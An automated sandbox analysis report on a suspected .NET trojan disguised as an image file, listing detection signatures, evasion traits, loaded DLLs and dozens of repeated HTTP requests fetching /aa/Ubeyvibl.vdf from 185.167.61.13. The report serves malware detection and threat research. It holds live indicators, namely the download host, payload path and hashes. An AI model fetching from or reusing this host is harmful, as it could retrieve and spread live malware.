Edit tour

Windows Analysis Report
IMG_3322101870451.exe

Overview

General Information

Sample name:	IMG_3322101870451.exe
Analysis ID:	1526378
MD5:	8290ab3945cfc9355b5f18d4c4262cee
SHA1:	f459dd7cdbc4881d6357c517c2b8026d3da77965
SHA256:	23382ffd9ce9a9b163ed1b6f0ef80242f16c5bc85b0d302fd81b7c4f5cd48acd
Tags:	exeuser-abuse_ch
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

.NET source code contains potential unpacker

AI detected suspicious sample

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Yara signature match

Classification

Process Tree

System is w10x64

IMG_3322101870451.exe (PID: 8080 cmdline: "C:\Users\user\Desktop\IMG_3322101870451.exe" MD5: 8290AB3945CFC9355B5F18D4C4262CEE)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
IMG_3322101870451.exe	Saudi_Phish_Trojan	Detects a trojan used in Saudi Aramco Phishing	Florian Roth	0xa845:$s1: 7B 00 30 00 7D 00 7B 00 31 00 7D 00 5C 00 00 09 2E 00 64 00 6C 00 6C 00 00 11 77 00 33 00 77 00 70 00 2E 00 65 00 78 00 65 00 00 1B 61 00 73 00 70 00 6E 00 65 00 74 00 5F 00 77 00 70 00 2E 00 ...

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.IMG_3322101870451.exe.f20000.0.unpack	Saudi_Phish_Trojan	Detects a trojan used in Saudi Aramco Phishing	Florian Roth	0xa845:$s1: 7B 00 30 00 7D 00 7B 00 31 00 7D 00 5C 00 00 09 2E 00 64 00 6C 00 6C 00 00 11 77 00 33 00 77 00 70 00 2E 00 65 00 78 00 65 00 00 1B 61 00 73 00 70 00 6E 00 65 00 74 00 5F 00 77 00 70 00 2E 00 ...

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: IMG_3322101870451.exe

Avira: detected

Multi AV Scanner detection for domain / URL

Source: http://185.167.61.13

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for submitted file

Source: IMG_3322101870451.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: IMG_3322101870451.exe

Joe Sandbox ML: detected

Source: IMG_3322101870451.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: IMG_3322101870451.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive

Source: Joe Sandbox View

IP Address: 185.167.61.13 185.167.61.13

Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13
Source: unknown	TCP traffic detected without corresponding DNS query: 185.167.61.13

Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aa/Ubeyvibl.vdf HTTP/1.1Host: 185.167.61.13Connection: Keep-Alive

Source: IMG_3322101870451.exe, 00000000.00000002.3814244716.00000000032C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.167.61.13
Source: IMG_3322101870451.exe, 00000000.00000002.3814244716.000000000333E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.167.61.13/aa/Ubeyvibl.vdf
Source: IMG_3322101870451.exe, 00000000.00000002.3814244716.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.000000000344C000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.00000000033C6000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.000000000333E000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.000000000337E000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.0000000003396000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.00000000033FA000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.0000000003450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.167.61.13/aa/Ubeyvibl.vdfP
Source: IMG_3322101870451.exe, 00000000.00000002.3814244716.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.000000000338A000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.00000000033C6000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.0000000003366000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.000000000333E000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.000000000337E000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.0000000003396000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.000000000335F000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.00000000033FA000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.0000000003448000.00000004.00000800.00020000.00000000.sdmp, IMG_3322101870451.exe, 00000000.00000002.3814244716.0000000003450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.167.61.13D
Source: IMG_3322101870451.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: IMG_3322101870451.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: IMG_3322101870451.exe	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: IMG_3322101870451.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: IMG_3322101870451.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: IMG_3322101870451.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: IMG_3322101870451.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: IMG_3322101870451.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: IMG_3322101870451.exe	String found in binary or memory: http://ocsp.digicert.com0N
Source: IMG_3322101870451.exe	String found in binary or memory: http://ocsp.thawte.com0
Source: IMG_3322101870451.exe	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: IMG_3322101870451.exe	String found in binary or memory: http://s.symcd.com06
Source: IMG_3322101870451.exe, 00000000.00000002.3814244716.000000000333E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: IMG_3322101870451.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: IMG_3322101870451.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: IMG_3322101870451.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: IMG_3322101870451.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: IMG_3322101870451.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: IMG_3322101870451.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: IMG_3322101870451.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: IMG_3322101870451.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: IMG_3322101870451.exe	String found in binary or memory: https://d.symcb.com/rpa0.
Source: IMG_3322101870451.exe	String found in binary or memory: https://www.digicert.com/CPS0

System Summary

Malicious sample detected (through community Yara rule)

Source: IMG_3322101870451.exe, type: SAMPLE	Matched rule: Detects a trojan used in Saudi Aramco Phishing Author: Florian Roth
Source: 0.0.IMG_3322101870451.exe.f20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects a trojan used in Saudi Aramco Phishing Author: Florian Roth

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: IMG_3322101870451.exe

Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Code function: 0_2_01801C0A	0_2_01801C0A
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Code function: 0_2_01805A5C	0_2_01805A5C
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Code function: 0_2_01802554	0_2_01802554
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Code function: 0_2_01801C4C	0_2_01801C4C
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Code function: 0_2_01801704	0_2_01801704
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Code function: 0_2_01805A96	0_2_01805A96

Source: IMG_3322101870451.exe

Static PE information: invalid certificate

Source: IMG_3322101870451.exe, 00000000.00000002.3813828700.000000000147E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs IMG_3322101870451.exe
Source: IMG_3322101870451.exe, 00000000.00000000.1356903689.0000000000F22000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameTwihm.exeD vs IMG_3322101870451.exe
Source: IMG_3322101870451.exe	Binary or memory string: OriginalFilenameTwihm.exeD vs IMG_3322101870451.exe

Source: IMG_3322101870451.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: IMG_3322101870451.exe, type: SAMPLE	Matched rule: Saudi_Phish_Trojan date = 2017-10-12, hash1 = 8ad94dc5d59aa1e9962c76fd5ca042e582566049a97aef9f5730ba779e5ebb91, author = Florian Roth, description = Detects a trojan used in Saudi Aramco Phishing, reference = https://goo.gl/Z3JUAA, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.IMG_3322101870451.exe.f20000.0.unpack, type: UNPACKEDPE	Matched rule: Saudi_Phish_Trojan date = 2017-10-12, hash1 = 8ad94dc5d59aa1e9962c76fd5ca042e582566049a97aef9f5730ba779e5ebb91, author = Florian Roth, description = Detects a trojan used in Saudi Aramco Phishing, reference = https://goo.gl/Z3JUAA, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: IMG_3322101870451.exe, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: IMG_3322101870451.exe, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal88.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\IMG_3322101870451.exe

Mutant created: NULL

Source: IMG_3322101870451.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: IMG_3322101870451.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\IMG_3322101870451.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: IMG_3322101870451.exe

ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_3322101870451.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\IMG_3322101870451.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\IMG_3322101870451.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: IMG_3322101870451.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: IMG_3322101870451.exe

